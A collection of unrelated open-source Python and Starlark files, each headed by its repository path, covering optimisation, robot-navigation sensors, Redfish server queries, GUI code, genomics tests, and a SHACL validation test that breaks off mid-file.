# Multi-objective but single fitness/target value. By using weighting method to convert from multiple objectives to single target
def obj_function(solution):
f1 = (sum(solution ** 2) - mean(solution)) / len(solution)
f2 = sum(sqrt(abs(solution)))
f3 = sum(mean(solution ** 2) - solution)
return [f1, f2, f3]
## Setting parameters
verbose = True
epoch = 100
pop_size = 50
lb1 = [-10, -5, -15, -20, -10, -15, -10, -30]
ub1 = [10, 5, 15, 20, 50, 30, 100, 85]
optimizer = BaseGA(obj_function, lb1, ub1, "min", verbose, epoch, pop_size, obj_weight=[0.2, 0.5, 0.3])
best_position, best_fitness, g_best_fit_list, c_best_fit_list = optimizer.train()
print(best_position)
## On the exploration and exploitation in popular swarm-based metaheuristic algorithms (the idea come from this paper)
# This exploration/exploitation chart should draws for single algorithm and single fitness function
export_explore_exploit_chart([optimizer.history_list_explore, optimizer.history_list_exploit]) # Draw exploration and exploitation chart
# Parameter for this function
# data: is the list of array
# + optimizer.history_list_explore -> List of exploration percentages
# + optimizer.history_list_exploit -> List of exploitation percentages
# title: title of the figure
# list_legends: list of line's name, default = ("Exploration %", "Exploitation %")
# list_styles: matplotlib API, default = ('-', '-')
# list_colors: matplotlib API, default = ('blue', 'orange')
# x_label: string, default = "#Iteration"
# y_label: string, default = "Percentage"
# filename: string, default = "explore_exploit_chart"
# exts: matplotlib API, default = (".png", ".pdf") --> save figure in format of png and pdf
# verbose: show the figure on Python IDE, default = True
# This diversity chart should draws for multiple algorithms for a single fitness function at the same time to compare the diversity spreading
export_diversity_chart([optimizer.history_list_div], list_legends=['GA']) # Draw diversity measurement chart
# Parameter for this function
# data: is the list of array
# + optimizer1.history_list_div -> List of diversity spreading for this optimizer1
# + optimizer2.history_list_div -> List of diversity spreading for this optimizer1
# title: title of the figure
# list_legends: list, e.g. ("GA", "PSO",..)
# list_styles: matplotlib API, default = None
# list_colors: matplotlib API, default = None
# x_label: string, default = "#Iteration"
# y_label: string, default = "Diversity Measurement"
# filename: string, default = "diversity_chart"
# exts: matplotlib API, default = (".png", ".pdf") --> save figure in format of png and pdf
# verbose: show the figure on Python IDE, default = True
|
pypy/tool/isolate_slave.py
|
nanjekyejoannah/pypy
| 381 |
100678
|
import sys, os, imp
sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__), '..', '..')))
from pypy.tool import slaveproc
class IsolateSlave(slaveproc.Slave):
mod = None
def do_cmd(self, cmd):
cmd, data = cmd
if cmd == 'load':
assert self.mod is None
mod = data
if isinstance(mod, str):
mod = __import__(mod, {}, {}, ['__doc__'])
else:
dir, name = mod
file, pathname, description = imp.find_module(name, [dir])
try:
mod = imp.load_module(name, file, pathname, description)
finally:
if file:
file.close()
self.mod = mod
return 'loaded'
elif cmd == 'invoke':
assert self.mod is not None
func, args = data
try:
res = getattr(self.mod, func)(*args)
except KeyboardInterrupt:
raise
except:
exc_type = sys.exc_info()[0]
return ('exc', (exc_type.__module__, exc_type.__name__))
else:
return ('ok', res)
else:
return 'no-clue'
if __name__ == '__main__':
IsolateSlave().do()
|
habitat_extensions/sensors.py
|
Felix2048/VLN-CE
| 106 |
100701
|
<reponame>Felix2048/VLN-CE<gh_stars>100-1000
from copy import deepcopy
from typing import Any
import numpy as np
from gym import Space, spaces
from habitat.config import Config
from habitat.core.registry import registry
from habitat.core.simulator import Sensor, SensorTypes, Simulator
from habitat.sims.habitat_simulator.actions import HabitatSimActions
from habitat.tasks.nav.shortest_path_follower import ShortestPathFollower
from numpy import ndarray
from habitat_extensions.shortest_path_follower import (
ShortestPathFollowerCompat,
)
from habitat_extensions.task import VLNExtendedEpisode
@registry.register_sensor(name="GlobalGPSSensor")
class GlobalGPSSensor(Sensor):
"""Current agent location in global coordinate frame"""
cls_uuid: str = "globalgps"
def __init__(
self, *args: Any, sim: Simulator, config: Config, **kwargs: Any
):
self._sim = sim
self._dimensionality = config.DIMENSIONALITY
super().__init__(config=config)
def _get_uuid(self, *args: Any, **kwargs: Any):
return self.cls_uuid
def _get_sensor_type(self, *args: Any, **kwargs: Any):
return SensorTypes.POSITION
def _get_observation_space(self, *args: Any, **kwargs: Any):
return spaces.Box(
low=np.finfo(np.float).min,
high=np.finfo(np.float).max,
shape=(self._dimensionality,),
dtype=np.float,
)
def get_observation(self, *args: Any, **kwargs: Any):
agent_position = self._sim.get_agent_state().position
if self._dimensionality == 2:
agent_position = np.array([agent_position[0], agent_position[2]])
return agent_position.astype(np.float32)
@registry.register_sensor
class VLNOracleProgressSensor(Sensor):
"""Relative progress towards goal"""
cls_uuid: str = "progress"
def __init__(
self, sim: Simulator, config: Config, *args: Any, **kwargs: Any
) -> None:
self._sim = sim
super().__init__(config=config)
def _get_uuid(self, *args: Any, **kwargs: Any) -> str:
return self.cls_uuid
def _get_sensor_type(self, *args: Any, **kwargs: Any) -> SensorTypes:
return SensorTypes.MEASUREMENT
def _get_observation_space(self, *args: Any, **kwargs: Any) -> Space:
return spaces.Box(low=0.0, high=1.0, shape=(1,), dtype=np.float)
def get_observation(self, *args: Any, episode, **kwargs: Any) -> float:
distance_to_target = self._sim.geodesic_distance(
self._sim.get_agent_state().position.tolist(),
episode.goals[0].position,
)
# just in case the agent ends up somewhere it shouldn't
if not np.isfinite(distance_to_target):
return np.array([0.0])
distance_from_start = episode.info["geodesic_distance"]
return np.array(
[(distance_from_start - distance_to_target) / distance_from_start]
)
@registry.register_sensor
class AngleFeaturesSensor(Sensor):
"""Returns a fixed array of features describing relative camera poses based
on https://arxiv.org/abs/1806.02724. This encodes heading angles but
assumes a single elevation angle.
"""
cls_uuid: str = "angle_features"
def __init__(self, *args: Any, config: Config, **kwargs: Any) -> None:
self.cameras = config.CAMERA_NUM
super().__init__(config)
orient = [np.pi * 2 / self.cameras * i for i in range(self.cameras)]
self.angle_features = np.stack(
[np.array([np.sin(o), np.cos(o), 0.0, 1.0]) for o in orient]
)
def _get_uuid(self, *args: Any, **kwargs: Any) -> str:
return self.cls_uuid
def _get_sensor_type(self, *args: Any, **kwargs: Any) -> SensorTypes:
return SensorTypes.HEADING
def _get_observation_space(self, *args: Any, **kwargs: Any) -> Space:
return spaces.Box(
low=-1.0,
high=1.0,
shape=(self.cameras, 4),
dtype=np.float,
)
def get_observation(self, *args: Any, **kwargs: Any) -> ndarray:
return deepcopy(self.angle_features)
@registry.register_sensor
class ShortestPathSensor(Sensor):
"""Provides the next action to follow the shortest path to the goal."""
cls_uuid: str = "shortest_path_sensor"
def __init__(
self, *args: Any, sim: Simulator, config: Config, **kwargs: Any
):
super().__init__(config=config)
cls = ShortestPathFollower
if config.USE_ORIGINAL_FOLLOWER:
cls = ShortestPathFollowerCompat
self.follower = cls(sim, config.GOAL_RADIUS, return_one_hot=False)
def _get_uuid(self, *args: Any, **kwargs: Any):
return self.cls_uuid
def _get_sensor_type(self, *args: Any, **kwargs: Any):
return SensorTypes.TACTILE
def _get_observation_space(self, *args: Any, **kwargs: Any):
return spaces.Box(low=0.0, high=100, shape=(1,), dtype=np.float)
def get_observation(self, *args: Any, episode, **kwargs: Any):
best_action = self.follower.get_next_action(episode.goals[0].position)
if best_action is None:
best_action = HabitatSimActions.STOP
return np.array([best_action])
@registry.register_sensor
class RxRInstructionSensor(Sensor):
"""Loads pre-computed intruction features from disk in the baseline RxR
BERT file format.
https://github.com/google-research-datasets/RxR/tree/7a6b87ba07959f5176aa336192a8c5dc85ca1b8e#downloading-bert-text-features
"""
cls_uuid: str = "rxr_instruction"
def __init__(self, *args: Any, config: Config, **kwargs: Any):
self.features_path = config.features_path
super().__init__(config=config)
def _get_uuid(self, *args: Any, **kwargs: Any) -> str:
return self.cls_uuid
def _get_sensor_type(self, *args: Any, **kwargs: Any):
return SensorTypes.MEASUREMENT
def _get_observation_space(self, *args: Any, **kwargs: Any):
return spaces.Box(
low=np.finfo(np.float).min,
high=np.finfo(np.float).max,
shape=(512, 768),
dtype=np.float,
)
def get_observation(
self, *args: Any, episode: VLNExtendedEpisode, **kwargs
):
features = np.load(
self.features_path.format(
split=episode.instruction.split,
id=int(episode.instruction.instruction_id),
lang=episode.instruction.language.split("-")[0],
)
)
feats = np.zeros((512, 768), dtype=np.float32)
s = features["features"].shape
feats[: s[0], : s[1]] = features["features"]
return feats
|
examples/rest-api-python/src/db/notes.py
|
drewfish/serverless-stack
| 5,922 |
100719
|
import time
import numpy
def getNotes():
return {
"id1": {
"noteId": "id1",
"userId": "user1",
"content": str(numpy.array([1,2,3,4])),
"createdAt": int(time.time()),
},
"id2": {
"noteId": "id2",
"userId": "user2",
"content": str(numpy.array([5,6,7,8])),
"createdAt": int(time.time()-1000),
},
}
|
test/com/facebook/buck/core/starlark/rule/testdata/print_works_in_impl/defs.bzl
|
Unknoob/buck
| 8,027 |
100741
|
<gh_stars>1000+
""" Module docstring """
def _impl(_ctx):
print("printing at debug level")
my_rule = rule(
attrs = {
},
implementation = _impl,
)
|
code/n4_bias_correction.py
|
Delta-Sigma/brain_segmentation
| 315 |
100742
|
from nipype.interfaces.ants import N4BiasFieldCorrection
import sys
import os
import ast
if len(sys.argv) < 2:
print("INPUT from ipython: run n4_bias_correction input_image dimension n_iterations(optional, form:[n_1,n_2,n_3,n_4]) output_image(optional)")
sys.exit(1)
# if output_image is given
if len(sys.argv) > 3:
n4 = N4BiasFieldCorrection(output_image=sys.argv[4])
else:
n4 = N4BiasFieldCorrection()
# dimension of input image, input image
n4.inputs.dimension = int(sys.argv[2])
n4.inputs.input_image = sys.argv[1]
# if n_dinesions arg given
if len(sys.argv) > 2:
n4.inputs.n_iterations = ast.literal_eval(sys.argv[3])
n4.run()
|
promise2012/Vnet/util.py
|
kevin28520/VNet3D
| 121 |
100744
|
from tensorflow.python.framework import graph_util
from tensorflow.python.framework import graph_io
import tensorflow as tf
def convertMetaModelToPbModel(meta_model, pb_model):
# Step 1
# import the model metagraph
saver = tf.train.import_meta_graph(meta_model + '.meta', clear_devices=True)
# make that as the default graph
graph = tf.get_default_graph()
sess = tf.Session()
# now restore the variables
saver.restore(sess, meta_model)
# Step 2
# Find the output name
for op in graph.get_operations():
print(op.name)
# Step 3
output_graph_def = graph_util.convert_variables_to_constants(
sess, # The session
sess.graph_def, # input_graph_def is useful for retrieving the nodes
["Placeholder", "output/Sigmoid"])
# Step 4
# output folder
output_fld = './'
# output pb file name
output_model_file = 'model.pb'
# write the graph
graph_io.write_graph(output_graph_def, pb_model + output_fld, output_model_file, as_text=False)
|
small_text/integrations/transformers/__init__.py
|
chschroeder/small-text
| 218 |
100798
|
from small_text.integrations.pytorch.exceptions import PytorchNotFoundError
try:
from small_text.integrations.transformers.datasets import TransformersDataset
from small_text.integrations.transformers.classifiers.classification import (
TransformerModelArguments,
TransformerBasedClassification,
TransformerBasedEmbeddingMixin)
except PytorchNotFoundError:
pass
|
examples/Redfish/get_SmartArray_EncryptionSettings.py
|
andreaslangnevyjel/python-ilorest-library
| 214 |
100825
|
# Copyright 2020 Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# -*- coding: utf-8 -*-
"""
An example of gathering the smart array encryption settings on HPE iLO systems
"""
import sys
from redfish import RedfishClient
from redfish.rest.v1 import ServerDownOrUnreachableError
from get_resource_directory import get_resource_directory
def get_SmartArray_EncryptionSettings(_redfishobj, desired_properties):
smartstorage_response = []
smartarraycontrollers = dict()
resource_instances = get_resource_directory(_redfishobj)
if DISABLE_RESOURCE_DIR or not resource_instances:
#if we do not have a resource directory or want to force it's non use to find the
#relevant URI
systems_uri = _redfishobj.root.obj['Systems']['@odata.id']
systems_response = _redfishobj.get(systems_uri)
systems_members_uri = next(iter(systems_response.obj['Members']))['@odata.id']
systems_members_response = _redfishobj.get(systems_members_uri)
smart_storage_uri = systems_members_response.obj.Oem.Hpe.Links\
['SmartStorage']['@odata.id']
smart_storage_arraycontrollers_uri = _redfishobj.get(smart_storage_uri).obj.Links\
['ArrayControllers']['@odata.id']
smartstorage_response = _redfishobj.get(smart_storage_arraycontrollers_uri).obj['Members']
else:
for instance in resource_instances:
#Use Resource directory to find the relevant URI
if '#HpeSmartStorageArrayControllerCollection.' in instance['@odata.type']:
smartstorage_uri = instance['@odata.id']
smartstorage_response = _redfishobj.get(smartstorage_uri).obj['Members']
break
for controller in smartstorage_response:
smartarraycontrollers[controller['@odata.id']] = _redfishobj.get(controller['@odata.id']).\
obj
sys.stdout.write("Encryption Properties for Smart Storage Array Controller \'%s\' : \n" \
% smartarraycontrollers[controller['@odata.id']].get('Id'))
for data in smartarraycontrollers[controller['@odata.id']]:
if data in desired_properties:
sys.stdout.write("\t %s : %s\n" % (data, smartarraycontrollers[controller\
['@odata.id']].get(data)))
if __name__ == "__main__":
# When running on the server locally use the following commented values
#SYSTEM_URL = None
#LOGIN_ACCOUNT = None
#LOGIN_PASSWORD = <PASSWORD>
# When running remotely connect using the secured (https://) address,
# account name, and password to send https requests
# SYSTEM_URL acceptable examples:
# "https://10.0.0.100"
# "https://ilo.hostname"
SYSTEM_URL = "https://10.0.0.100"
LOGIN_ACCOUNT = "admin"
LOGIN_PASSWORD = "password"
#list of desired properties related to Smart Array controller encryption
DESIRED_PROPERTIES = ["Name", "Model", "SerialNumber", "EncryptionBootPasswordSet",\
"EncryptionCryptoOfficerPasswordSet",\
"EncryptionLocalKeyCacheEnabled", "EncryptionMixedVolumesEnabled",\
"EncryptionPhysicalDriveCount", "EncryptionRecoveryParamsSet",\
"EncryptionStandaloneModeEnabled", "EncryptionUserPasswordSet"]
# flag to force disable resource directory. Resource directory and associated operations are
# intended for HPE servers.
DISABLE_RESOURCE_DIR = False
try:
# Create a Redfish client object
REDFISHOBJ = RedfishClient(base_url=SYSTEM_URL, username=LOGIN_ACCOUNT, \
password=LOGIN_PASSWORD)
# Login with the Redfish client
REDFISHOBJ.login()
except ServerDownOrUnreachableError as excp:
sys.stderr.write("ERROR: server not reachable or does not support RedFish.\n")
sys.exit()
get_SmartArray_EncryptionSettings(REDFISHOBJ, DESIRED_PROPERTIES)
REDFISHOBJ.logout()
|
about.py
|
ardovm/wxGlade
| 225 |
100831
|
"""
About box with general info
@copyright: 2002-2007 <NAME>
@copyright: 2014-2016 <NAME>
@copyright: 2017 <NAME>
@license: MIT (see LICENSE.txt) - THIS PROGRAM COMES WITH NO WARRANTY
"""
import bugdialog
import codecs
import wx
import wx.html
import wx.lib.wxpTag
import config
import misc
import os.path
class wxGladeAboutBox(wx.Dialog):
text = '''
<html>
<body bgcolor="%s">
<!-- <font size="-1"> -->
<center>
<table align="center" border="2" cellspacing="0">
<tr>
<td align="center"><img src="%s">
</td></tr>
<tr><td bgcolor="#000000" align="center">
<font color="#ffffff">Version %s on Python %s and wxPython %s</font>
</td></tr>
</table>
</center>
<!-- </font> -->
<table border="0" cellpadding="0" cellspacing="0">
<tr><td width="50"></td><td>
<!-- <font size="-1"> -->
<b><p>License: MIT (see <a href="show_license">LICENSE.txt</a>)</b><br>
<!-- wxPyColourChooser code copyright (c) 2002-2004 <br><NAME>
(wxWindows license) -->
<p>Home page:
<a href="http://wxglade.sourceforge.net">http://wxglade.sourceforge.net</a>
<p>For credits, see
<a href="show_credits">CREDITS.txt</a>.<!-- </font> --></td>
</tr></table>
</body>
</html>
'''
def __init__(self, parent=None):
wx.Dialog.__init__(self, parent, -1, _('About wxGlade'))
html = wx.html.HtmlWindow(self, -1, size=(480, 250))
html.Bind(wx.html.EVT_HTML_LINK_CLICKED, self.OnLinkClicked)
# it's recommended at least for GTK2 based wxPython
if "gtk2" in wx.PlatformInfo:
html.SetStandardFonts()
bgcolor = misc.color_to_string(self.GetBackgroundColour())
icon_path = os.path.join(config.icons_path, 'wxglade_small.png')
html.SetPage( self.text % (bgcolor, icon_path, config.version, config.py_version, config.wx_version) )
ir = html.GetInternalRepresentation()
ir.SetIndent(0, wx.html.HTML_INDENT_ALL)
html.SetSize((ir.GetWidth(), ir.GetHeight()))
szr = wx.BoxSizer(wx.VERTICAL)
szr.Add(html, 0, wx.TOP|wx.ALIGN_CENTER, 10)
szr.Add(wx.StaticLine(self, -1), 0, wx.LEFT|wx.RIGHT|wx.EXPAND, 20)
szr2 = wx.BoxSizer(wx.HORIZONTAL)
btn = wx.Button(self, wx.ID_OK, _("OK"))
btn.SetDefault()
szr2.Add(btn)
if wx.Platform == '__WXGTK__':
extra_border = 5 # border around a default button
else:
extra_border = 0
szr.Add(szr2, 0, wx.ALL|wx.ALIGN_RIGHT, 20 + extra_border)
self.SetAutoLayout(True)
self.SetSizer(szr)
szr.Fit(self)
self.Layout()
if parent: self.CenterOnParent()
else: self.CenterOnScreen()
def OnLinkClicked(self, event):
href = event.GetLinkInfo().GetHref()
if href == 'show_license':
if config.license_file:
from wx.lib.dialogs import ScrolledMessageDialog
try:
license_file = codecs.open(config.license_file, encoding='UTF-8')
dlg = ScrolledMessageDialog( self, license_file.read(), "wxGlade - License" )
license_file.close()
dlg.ShowModal()
dlg.Destroy()
except EnvironmentError as inst:
bugdialog.ShowEnvironmentError(
_('''Can't read the file "LICENSE.txt".\n\nYou can get a license copy at\n'''
'''http://www.opensource.org/licenses/mit-license.php'''), inst)
else:
wx.MessageBox(_('File "LICENSE.txt" not found!\nYou can get a license copy at\n'
'http://www.opensource.org/licenses/mit-license.php'),
_('Error'), wx.OK | wx.CENTRE | wx.ICON_EXCLAMATION)
elif href == 'show_credits':
if config.credits_file:
from wx.lib.dialogs import ScrolledMessageDialog
try:
credits_file = codecs.open( config.credits_file, encoding='UTF-8' )
dlg = ScrolledMessageDialog( self, credits_file.read(), _("wxGlade - Credits") )
credits_file.close()
dlg.ShowModal()
dlg.Destroy()
except EnvironmentError as inst:
bugdialog.ShowEnvironmentError(_('''Can't read the file "CREDITS.txt"'''), inst)
else:
wx.MessageBox(_('File "CREDITS.txt" not found!'), _('Error'),
wx.OK | wx.CENTRE | wx.ICON_EXCLAMATION)
else:
import webbrowser
webbrowser.open(href, new=True)
|
tests/test_hosts_entry.py
|
mastanpatel/python-hosts
| 102 |
100847
|
<reponame>mastanpatel/python-hosts
# -*- coding: utf-8 -*-
import os
import sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from python_hosts.hosts import HostsEntry
def test_create_ipv4_instance():
""" add an ipv4 type entry """
hosts_entry = HostsEntry(entry_type='ipv4', address='1.2.3.4', names=['example.com', 'example'])
assert hosts_entry.entry_type == 'ipv4'
assert hosts_entry.address == '1.2.3.4'
assert hosts_entry.names == ['example.com', 'example']
def test_str_to_hostentry_ipv4():
str_entry = HostsEntry.str_to_hostentry('10.10.10.10 example.com example.org example')
assert str_entry.entry_type == 'ipv4'
assert str_entry.address == '10.10.10.10'
assert str_entry.names == ['example.com', 'example.org', 'example']
def test_str_to_hostentry_ipv6():
str_entry = HostsEntry.str_to_hostentry('2001:0db8:85a3:0042:1000:8a2e:0370:7334 example.com example')
assert str_entry.entry_type == 'ipv6'
assert str_entry.address == '2001:0db8:85a3:0042:1000:8a2e:0370:7334'
assert str_entry.names == ['example.com', 'example']
def test_str_to_hostentry_returns_fails_with_false():
result = HostsEntry.str_to_hostentry('invalid example.com example')
assert not result
def test_hostentry_repr():
an_entry = HostsEntry(entry_type='ipv4', address='1.2.3.4', comment=None, names=['example.com', 'example.org'])
assert repr(an_entry) == r"HostsEntry(entry_type='ipv4', " \
"address='1.2.3.4', " \
"comment=None, " \
"names=['example.com', 'example.org'])"
def test_hostentry_ipv4_str():
an_entry = HostsEntry(entry_type='ipv4', address='1.2.3.4', comment=None, names=['example.com', 'example.org'])
assert (str(an_entry)) == "TYPE=ipv4, ADDR=1.2.3.4, NAMES=example.com example.org"
def test_hostentry_comment_str():
an_entry = HostsEntry(entry_type='comment', address=None, comment='This is a comment', names=None)
assert (str(an_entry)) == "TYPE = comment, COMMENT = This is a comment"
def test_hostentry_blank_str():
an_entry = HostsEntry(entry_type='blank', address=None, comment=None, names=None)
assert (str(an_entry)) == "TYPE = blank"
|
objectModel/Python/cdm/persistence/syms/manifest_databases_persistence.py
|
rt112000/CDM
| 884 |
100890
|
<filename>objectModel/Python/cdm/persistence/syms/manifest_databases_persistence.py
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
import dateutil.parser
from cdm.enums import CdmObjectType
from cdm.objectmodel import CdmCorpusContext, CdmManifestDefinition
from cdm.persistence import PersistenceLayer
from cdm.utilities import logger, CopyOptions, ResolveOptions, time_utils, copy_data_utils
from . import utils
from .attribute_group_persistence import AttributeGroupPersistence
from .constant_entity_persistence import ConstantEntityPersistence
from .data_type_persistence import DataTypePersistence
from .entity_persistence import EntityPersistence
from .e2e_relationship_persistence import E2ERelationshipPersistence
from .manifest_declaration_persistence import ManifestDeclarationPersistence
from .import_persistence import ImportPersistence
from .local_entity_declaration_persistence import LocalEntityDeclarationPersistence
from .purpose_persistence import PurposePersistence
from .referenced_entity_declaration_persistence import ReferencedEntityDeclarationPersistence
from .trait_persistence import TraitPersistence
from .types import ManifestContent
from cdm.persistence.syms.models import ColumnRelationshipInformation, DataColumn, DataSource, DatabaseEntity, DatabaseProperties, FormatInfo, Namespace, PartitionInfo, PartitionInfoNamespace, PartitionInfoProperties, RelationshipEntity, RelationshipProperties, SASEntityType, ScalarTypeInfo, SchemaEntity, StorageDescriptor, TableEntity, TableNamespace, TablePartitioning, TableProperties, TypeInfo
_TAG = 'ManifestDatabasesPersistence'
class ManifestDatabasesPersistence:
is_persistence_async = False
formats = [PersistenceLayer.MANIFEST_EXTENSION]
@staticmethod
def from_object(ctx: CdmCorpusContext, name: str, namespace: str, path: str,
data_objs: 'SymsDatabasesResponse') -> 'CdmManifestDefinition':
manifest = ctx.corpus.make_object(CdmObjectType.MANIFEST_DEF, name)
manifest.name = name
manifest._folder_path = path
manifest._namespace = namespace
manifest.explanation = "This manifest contains list of SyMS databases represented as sub-manifests."
if len(manifest.imports) == 0 or not (x for x in manifest.imports if x.corpus_path == "cdm:/foundations.cdm.json"):
manifest.imports.append("cdm:/foundations.cdm.json")
if data_objs is not None and data_objs.items is not None:
for item in data_objs.items:
database = DatabaseEntity().deserialize(item)
if database.type == SASEntityType.database:
manifest.sub_manifests.append(ManifestDeclarationPersistence.from_data(ctx, database))
return manifest
|
test/test_string_representation.py
|
vladsaveliev/pyensembl
| 162 |
100926
|
<reponame>vladsaveliev/pyensembl
from pyensembl import Locus, Gene, ensembl_grch37, Transcript, Exon
from nose.tools import eq_
def test_Locus_string_representation():
locus = Locus("X", 1000, 1010, "+")
string_repr = str(locus)
expected = "Locus(contig='X', start=1000, end=1010, strand='+')"
eq_(string_repr, expected)
def test_Gene_string_representation():
gene = Gene(
gene_id="ENSG0001", gene_name="CAPITALISM",
biotype="protein_coding", contig="Y", start=1, end=5, strand="+",
genome=ensembl_grch37)
string_repr = str(gene)
expected = (
"Gene(gene_id='ENSG0001',"
" gene_name='CAPITALISM',"
" biotype='protein_coding',"
" contig='Y',"
" start=1, end=5, strand='+', genome='GRCh37')")
eq_(string_repr, expected)
def test_Transcript_string_representation():
transcript = Transcript(
transcript_id="ENST0001",
transcript_name="CAPITALISM-001",
gene_id="ENSG0001",
biotype="protein_coding",
contig="Y",
start=1,
end=5,
strand="+",
genome=ensembl_grch37)
expected = (
"Transcript(transcript_id='ENST0001',"
" transcript_name='CAPITALISM-001',"
" gene_id='ENSG0001',"
" biotype='protein_coding',"
" contig='Y',"
" start=1,"
" end=5, strand='+', genome='GRCh37')"
)
string_repr = str(transcript)
eq_(string_repr, expected)
def test_Exon_string_representation():
exon = Exon(
exon_id="ENSE0001",
gene_id="ENSG0001",
gene_name="CAPITALISM",
contig="Y",
start=1,
end=5,
strand="+")
expected = (
"Exon(exon_id='ENSE0001',"
" gene_id='ENSG0001',"
" gene_name='CAPITALISM',"
" contig='Y',"
" start=1,"
" end=5, strand='+')"
)
string_repr = str(exon)
eq_(string_repr, expected)
|
torchgeo/trainers/utils.py
|
khlaifiabilel/torchgeo
| 678 |
100935
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
"""Common trainer utilities."""
import warnings
from collections import OrderedDict
from typing import Dict, Optional, Tuple, Union
import torch
import torch.nn as nn
from torch import Tensor
from torch.nn.modules import Conv2d, Module
# https://github.com/pytorch/pytorch/issues/60979
# https://github.com/pytorch/pytorch/pull/61045
Module.__module__ = "nn.Module"
Conv2d.__module__ = "nn.Conv2d"
def extract_encoder(path: str) -> Tuple[str, Dict[str, Tensor]]:
"""Extracts an encoder from a pytorch lightning checkpoint file.
Args:
path: path to checkpoint file (.ckpt)
Returns:
tuple containing model name and state dict
Raises:
ValueError: if 'classification_model' or 'encoder' not in
checkpoint['hyper_parameters']
"""
checkpoint = torch.load( # type: ignore[no-untyped-call]
path, map_location=torch.device("cpu") # type: ignore[attr-defined]
)
if "classification_model" in checkpoint["hyper_parameters"]:
name = checkpoint["hyper_parameters"]["classification_model"]
state_dict = checkpoint["state_dict"]
state_dict = OrderedDict({k: v for k, v in state_dict.items() if "model." in k})
state_dict = OrderedDict(
{k.replace("model.", ""): v for k, v in state_dict.items()}
)
elif "encoder" in checkpoint["hyper_parameters"]:
name = checkpoint["hyper_parameters"]["encoder"]
state_dict = checkpoint["state_dict"]
state_dict = OrderedDict(
{k: v for k, v in state_dict.items() if "model.encoder.model" in k}
)
state_dict = OrderedDict(
{k.replace("model.encoder.model.", ""): v for k, v in state_dict.items()}
)
else:
raise ValueError(
"Unknown checkpoint task. Only encoder or classification_model"
" extraction is supported"
)
return name, state_dict
def load_state_dict(model: Module, state_dict: Dict[str, Tensor]) -> Module:
"""Load pretrained resnet weights to a model.
Args:
model: model to load the pretrained weights to
state_dict: dict containing tensor parameters
Returns:
the model with pretrained weights
Warns:
If input channels in model != pretrained model input channels
If num output classes in model != pretrained model num classes
"""
in_channels = model.conv1.in_channels # type: ignore[union-attr]
expected_in_channels = state_dict["conv1.weight"].shape[1]
num_classes = model.fc.out_features # type: ignore[union-attr]
expected_num_classes = state_dict["fc.weight"].shape[0]
if in_channels != expected_in_channels:
warnings.warn(
f"input channels {in_channels} != input channels in pretrained"
f" model {expected_in_channels}. Overriding with new input channels"
)
del state_dict["conv1.weight"]
if num_classes != expected_num_classes:
warnings.warn(
f"num classes {num_classes} != num classes in pretrained model"
f" {expected_num_classes}. Overriding with new num classes"
)
del state_dict["fc.weight"], state_dict["fc.bias"]
model.load_state_dict(state_dict, strict=False) # type: ignore[arg-type]
return model
def reinit_initial_conv_layer(
layer: Conv2d,
new_in_channels: int,
keep_rgb_weights: bool,
new_stride: Optional[Union[int, Tuple[int, int]]] = None,
new_padding: Optional[Union[str, Union[int, Tuple[int, int]]]] = None,
) -> Conv2d:
"""Clones a Conv2d layer while optionally retaining some of the original weights.
When replacing the first convolutional layer in a model with one that operates over
different number of input channels, we sometimes want to keep a subset of the kernel
weights the same (e.g. the RGB weights of an ImageNet pretrained model). This is a
convenience function that performs that function.
Args:
layer: the Conv2d layer to initialize
new_in_channels: the new number of input channels
keep_rgb_weights: flag indicating whether to re-initialize the first 3 channels
new_stride: optionally, overwrites the ``layer``'s stride with this value
new_padding: optionally, overwrites the ``layers``'s padding with this value
Returns:
a Conv2d layer with new kernel weights
"""
use_bias = layer.bias is not None
if keep_rgb_weights:
w_old = layer.weight.data[:, :3, :, :].clone()
if use_bias:
# mypy doesn't realize that bias isn't None here...
b_old = layer.bias.data.clone() # type: ignore[union-attr]
updated_stride = layer.stride if new_stride is None else new_stride
updated_padding = layer.padding if new_padding is None else new_padding
new_layer = Conv2d(
new_in_channels,
layer.out_channels,
kernel_size=layer.kernel_size, # type: ignore[arg-type]
stride=updated_stride, # type: ignore[arg-type]
padding=updated_padding, # type: ignore[arg-type]
dilation=layer.dilation, # type: ignore[arg-type]
groups=layer.groups,
bias=use_bias,
padding_mode=layer.padding_mode,
)
nn.init.kaiming_normal_( # type: ignore[no-untyped-call]
new_layer.weight, mode="fan_out", nonlinearity="relu"
)
if keep_rgb_weights:
new_layer.weight.data[:, :3, :, :] = w_old
if use_bias:
new_layer.bias.data = b_old # type: ignore[union-attr]
return new_layer
|
test/issues/test_071.py
|
ajnelson-nist/pySHACL
| 167 |
100951
|
# -*- coding: utf-8 -*-
#
"""
https://github.com/RDFLib/pySHACL/issues/71
"""
import rdflib
from pyshacl import validate
shacl_file_text = """\
@prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
@prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
@prefix dc: <http://purl.org/dc/elements/1.1/> .
@prefix sh: <http://www.w3.org/ns/shacl#> .
@prefix xml: <http://www.w3.org/XML/1998/namespace> .
@prefix xsd: <http://www.w3.org/2001/XMLSchema#> .
@prefix owl: <http://www.w3.org/2002/07/owl#> .
@prefix geo: <http://example.org/geo/> .
@prefix ex: <http://example.com#> .
@prefix : <http://example.com/issue/071#> .
<http://example.com/issue/071>
rdf:type owl:Ontology .
:PlaceShape
a sh:NodeShape ;
sh:targetClass ex:Place ;
sh:property [
sh:path geo:asWKT ;
sh:nodeKind sh:Literal ;
sh:datatype rdfs:Literal ;
] ;
sh:property [
sh:path geo:asWKT ;
sh:nodeKind sh:Literal ;
sh:datatype rdfs:Datatype ;
] ;
sh:property [
sh:path geo:asWKT ;
sh:nodeKind sh:Literal ;
sh:datatype geo:wktLiteral ;
] ;
.
"""
data_file_text = """\
